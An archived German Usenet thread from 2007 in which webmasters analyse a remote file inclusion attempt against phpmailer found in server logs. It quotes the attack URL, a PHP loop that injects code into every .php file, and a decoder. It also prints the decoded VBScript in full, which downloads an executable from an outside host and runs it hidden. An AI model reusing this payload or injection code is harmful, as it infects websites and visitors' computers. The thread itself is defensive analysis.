Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

sicherheitslücke in phpmailer?

1 view
Skip to first unread message

Ralf Zschemisch

unread,
Sep 8, 2007, 7:37:56 AM9/8/07
to
Hallo,

ich verwende die Mail-Klasse phpmailer

http://phpmailer.sf.net

Bei Auswertungen von Log-Files wurde dies gefunden

phpmailer/class.phpmailer.php?lang_path=http://usuarios.arnet.com.ar/larry123/safe.txt?
(was - aus irgendwelchen Gründen auch immer - bei mir nicht funktionierte)


Gibt es in der Klassen-Sammlung noch weitere lücken?

oder ist der wechsel auf eine andere Klasse z.B.
http://www.swiftmailer.org/

sinnvoll.

ciao

ralf

--
Mein Skizzenbuch
http://blog.myoos.de/

Hadanite Marasek

unread,
Sep 8, 2007, 9:31:02 AM9/8/07
to
Ralf Zschemisch schrieb:

> Hallo,
>
> ich verwende die Mail-Klasse phpmailer
>
> http://phpmailer.sf.net
>
> Bei Auswertungen von Log-Files wurde dies gefunden
>
> phpmailer/class.phpmailer.php?lang_path=http://usuarios.arnet.com.ar/larry123/safe.txt?
> (was - aus irgendwelchen Gründen auch immer - bei mir nicht funktionierte)

Der Eintrag besagt lediglich, dass jemand /versucht/ hat, eine
Sicherheitslücke auszunutzen. So what? Dass es nicht geklappt hat, ist
wohl ein Hinweis darauf, dass die Lücke nicht mehr existiert oder bei
Dir nicht ausgenutzt werden kann.
(sowas sind automatisierte Angriffe, anders ist wohl kaum zu erklären,
das Leute auf meinem Webspace auf ein nicht vorhandenes Typo3 zugreifen)

Ob die Klasse noch weitere Lücken hat? Vermutlich, wie andere Klassen
auch. Wenn Du solche direkten Angriffe verhindern willst, kannst Du auch
einfach eine .htaccess in das Klassenverzeichnis stecken, dann kann
niemand mehr von aussen auf die Klassendateien selber zugreifen, was ja
auch nicht nötig ist.

--
Mein Zeugs:
http://www.hadanite-marasek.de/classes.php
http://www.objektivsuche.de/

Dirk Haun

unread,
Sep 8, 2007, 11:28:58 AM9/8/07
to
Hadanite Marasek <mar...@telton.de> wrote:

> (sowas sind automatisierte Angriffe, anders ist wohl kaum zu erklären,
> das Leute auf meinem Webspace auf ein nicht vorhandenes Typo3 zugreifen)

Siehe auch <http://de.wikipedia.org/wiki/Skriptkiddie>

bye, Dirk

Martin Lemke

unread,
Sep 9, 2007, 5:30:07 PM9/9/07
to
Ralf Zschemisch schrieb:

> http://usuarios.arnet.com.ar/larry123/safe.txt

Was es alles gibt!

foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}

Sorgt anscheinend dafür, dass ein iframe an alle php.*, htm.* und
*.html-Dokumente angehängt wird. Dem besseren Ranking dient es
offensichtlich nicht, denn der Zielurl enthält ein VBS-Skript:

http://usuarios.arnet.com.ar/alvarezluque/morgan.html

Mein Versuch, das Skript in php zu übersetzen, um zu ergründen was
hinterher "document.write s" im Klartext heißt, scheiterte. Hat jemand ein
besseres Händchen?

Martin

Martin Lemke

unread,
Sep 9, 2007, 5:30:56 PM9/9/07
to
Ralf Zschemisch schrieb:

> http://usuarios.arnet.com.ar/larry123/safe.txt

Was es alles gibt!

foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}

Sorgt anscheinend dafür, dass ein iframe an alle *.php, *.htm und

Michael Fesser

unread,
Sep 10, 2007, 9:33:02 AM9/10/07
to
.oO(Martin Lemke)

>http://usuarios.arnet.com.ar/alvarezluque/morgan.html
>
>Mein Versuch, das Skript in php zu übersetzen, um zu ergründen was
>hinterher "document.write s" im Klartext heißt, scheiterte. Hat jemand ein
>besseres Händchen?

Hier mein PHP-Code:

<?php
header('Content-Type: text/plain');

$d = [Code aus dem VBS-Script];
$s = '';

for ($i = 1, $c = strlen($d); $i <= $c; $i++) {
$b = substr($d, $i-1, 1);
$a = ord($b);
switch ($a) {
case 1: $a = 9; break;
case 2: $a = 10; break;
case 3: $a = 13; break;
case 4: $a = 34;
}
if ($a <= 31 && $a >= 14) {
$s .= substr($s, strlen($s)-1-(ord(substr($d, $i, 1))-36+90*
(ord(substr($d, $i+1, 1))-35)), $a-14+4);
$i += 2;
} else {
if ($a >= 41 && $a <= 127) {
$a--;
}
$s .= ($a < 127) ? chr($a) : $b;
}
}

print $s;
?>

Und hier das Ergebnis:

<script language="VBScript">
on error resume next

dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html><script>

Micha

Martin Lemke

unread,
Sep 11, 2007, 7:48:37 AM9/11/07
to
Michael Fesser schrieb:

> Und hier das Ergebnis:

Danke für die Mühe!

Was ist denn das, wenn es fertig ist?

Eine verklausulierte Konsruktion zum Download einer Schadsoftware, die dann
per ShellExecute gestartet wird?

Martin

Michael Fesser

unread,
Sep 11, 2007, 9:51:29 AM9/11/07
to
.oO(Martin Lemke)

>Was ist denn das, wenn es fertig ist?
>
>Eine verklausulierte Konsruktion zum Download einer Schadsoftware, die dann
>per ShellExecute gestartet wird?

So sieht's jedenfalls aus. Die EXE-Datei (ca. 1MB) hab ich mir nun
allerdings nicht weiter angeschaut ...

Micha

Martin Lemke

unread,
Sep 12, 2007, 5:46:34 PM9/12/07
to
Michael Fesser schrieb:

> Die EXE-Datei (ca. 1MB) hab ich mir nun
> allerdings nicht weiter angeschaut ...

Der Bundestrojaner kommt ja angeblich nur per Behördenpost. Machen
Terroristen E-Mails von Bundeverteidigungsministerium auf?

Martin

Michael Fesser

unread,
Sep 12, 2007, 7:04:14 PM9/12/07
to
.oO(Martin Lemke)

Die E-Mail enthält dann einen Link, mit welchem der Trojaner von
<http://www.wolfgang-schaeuble.de/> runtergeladen werden kann ...

SCNR
Micha

0 new messages